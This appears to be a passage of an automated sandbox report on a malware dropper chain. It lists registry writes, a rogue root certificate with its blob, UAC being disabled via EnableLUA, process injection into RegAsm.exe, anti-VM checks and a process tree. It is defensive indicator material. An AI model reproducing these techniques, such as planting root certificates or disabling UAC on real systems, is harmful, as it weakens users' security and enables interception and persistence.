Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time"	mdoway0zzKHieiq6eEa8XdGf.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	mdoway0zzKHieiq6eEa8XdGf.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
2072	amert.exe
2072	amert.exe
4668	explorha.exe
4668	explorha.exe
1000	RegAsm.exe
1000	RegAsm.exe
4208	powershell.exe
4208	powershell.exe
4208	powershell.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
4928	rundll32.exe
908	powershell.exe
908	powershell.exe
908	powershell.exe
1484	chrome.exe
1484	chrome.exe
5780	explorha.exe
5780	explorha.exe
5772	powershell.exe
5772	powershell.exe
5764	powershell.exe
5764	powershell.exe
5804	powershell.exe
5804	powershell.exe
5828	powershell.exe
5828	powershell.exe
5772	powershell.exe
1000	RegAsm.exe
1000	RegAsm.exe
5764	powershell.exe
5828	powershell.exe
5804	powershell.exe
4236	P8c6wHxJDJzuFl8waXLj8liZ.exe
4236	P8c6wHxJDJzuFl8waXLj8liZ.exe
2104	mdoway0zzKHieiq6eEa8XdGf.exe
2104	mdoway0zzKHieiq6eEa8XdGf.exe
744	SctKmdEkHmvBwpXSoPgIH7bV.exe
744	SctKmdEkHmvBwpXSoPgIH7bV.exe
1792	yR82Qr77psHhbzwPW9LtEJ9J.exe
1792	yR82Qr77psHhbzwPW9LtEJ9J.exe
4036	keks.exe
4036	keks.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
1484	chrome.exe
1484	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2480	regsvcs.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeDebugPrivilege	5772	powershell.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeDebugPrivilege	5764	powershell.exe
Token: SeDebugPrivilege	5804	powershell.exe
Token: SeDebugPrivilege	5828	powershell.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeDebugPrivilege	5792	trf.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeBackupPrivilege	5792	trf.exe
Token: SeSecurityPrivilege	5792	trf.exe
Token: SeSecurityPrivilege	5792	trf.exe
Token: SeSecurityPrivilege	5792	trf.exe
Token: SeSecurityPrivilege	5792	trf.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeDebugPrivilege	4236	P8c6wHxJDJzuFl8waXLj8liZ.exe
Token: SeImpersonatePrivilege	4236	P8c6wHxJDJzuFl8waXLj8liZ.exe
Token: SeDebugPrivilege	2104	mdoway0zzKHieiq6eEa8XdGf.exe
Token: SeImpersonatePrivilege	2104	mdoway0zzKHieiq6eEa8XdGf.exe
Token: SeDebugPrivilege	744	SctKmdEkHmvBwpXSoPgIH7bV.exe
Token: SeImpersonatePrivilege	744	SctKmdEkHmvBwpXSoPgIH7bV.exe
Token: SeDebugPrivilege	1792	yR82Qr77psHhbzwPW9LtEJ9J.exe
Token: SeImpersonatePrivilege	1792	yR82Qr77psHhbzwPW9LtEJ9J.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeDebugPrivilege	4036	keks.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe
Token: SeShutdownPrivilege	1484	chrome.exe
Token: SeCreatePagefilePrivilege	1484	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2072	amert.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
1484	chrome.exe
4692	da6b67b1f6.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
4692	da6b67b1f6.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe

Suspicious use of SendNotifyMessage 60 IoCs

pid	Process
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
4692	da6b67b1f6.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
1484	chrome.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
6008	uq8.1.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe
4692	da6b67b1f6.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3912 wrote to memory of 2772	3912	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	88
PID 3912 wrote to memory of 2772	3912	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	88
PID 3912 wrote to memory of 2772	3912	ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe	88
PID 2772 wrote to memory of 2784	2772	explorta.exe	99
PID 2772 wrote to memory of 2784	2772	explorta.exe	99
PID 2772 wrote to memory of 2784	2772	explorta.exe	99
PID 2772 wrote to memory of 2072	2772	explorta.exe	102
PID 2772 wrote to memory of 2072	2772	explorta.exe	102
PID 2772 wrote to memory of 2072	2772	explorta.exe	102
PID 2072 wrote to memory of 4668	2072	amert.exe	103
PID 2072 wrote to memory of 4668	2072	amert.exe	103
PID 2072 wrote to memory of 4668	2072	amert.exe	103
PID 4668 wrote to memory of 1992	4668	explorha.exe	104
PID 4668 wrote to memory of 1992	4668	explorha.exe	104
PID 4668 wrote to memory of 1992	4668	explorha.exe	104
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 1992 wrote to memory of 556	1992	swiiiii.exe	106
PID 4668 wrote to memory of 884	4668	explorha.exe	110
PID 4668 wrote to memory of 884	4668	explorha.exe	110
PID 4668 wrote to memory of 884	4668	explorha.exe	110
PID 4668 wrote to memory of 4036	4668	explorha.exe	111
PID 4668 wrote to memory of 4036	4668	explorha.exe	111
PID 4668 wrote to memory of 4036	4668	explorha.exe	111
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4036 wrote to memory of 1000	4036	swiy.exe	114
PID 4668 wrote to memory of 908	4668	explorha.exe	115
PID 4668 wrote to memory of 908	4668	explorha.exe	115
PID 2772 wrote to memory of 3020	2772	explorta.exe	117
PID 2772 wrote to memory of 3020	2772	explorta.exe	117
PID 2772 wrote to memory of 3020	2772	explorta.exe	117
PID 4668 wrote to memory of 1064	4668	explorha.exe	118
PID 4668 wrote to memory of 1064	4668	explorha.exe	118
PID 4668 wrote to memory of 1064	4668	explorha.exe	118
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 1064 wrote to memory of 1180	1064	gold.exe	119
PID 908 wrote to memory of 4208	908	file300un.exe	120
PID 908 wrote to memory of 4208	908	file300un.exe	120
PID 908 wrote to memory of 2480	908	file300un.exe	122
PID 908 wrote to memory of 2480	908	file300un.exe	122
PID 908 wrote to memory of 2480	908	file300un.exe	122
PID 908 wrote to memory of 2480	908	file300un.exe	122
PID 908 wrote to memory of 2480	908	file300un.exe	122
PID 908 wrote to memory of 2480	908	file300un.exe	122

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

C:\Users\Admin\AppData\Local\Temp\ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe
"C:\Users\Admin\AppData\Local\Temp\ccabd5bc8499c485e7abab1825f67a753a8ccfc822037f2368e3c6fa5f570926.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
  "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
    "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
    3⤵
    PID:2784
- - C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe
    "C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
      "C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4668
    - - C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1992
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:556
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1992 -s 876
        6⤵
        Program crash
        
        PID:1168
    - - C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000071001\jok.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:884
    - - C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4036
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Loads dropped DLL
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:1000
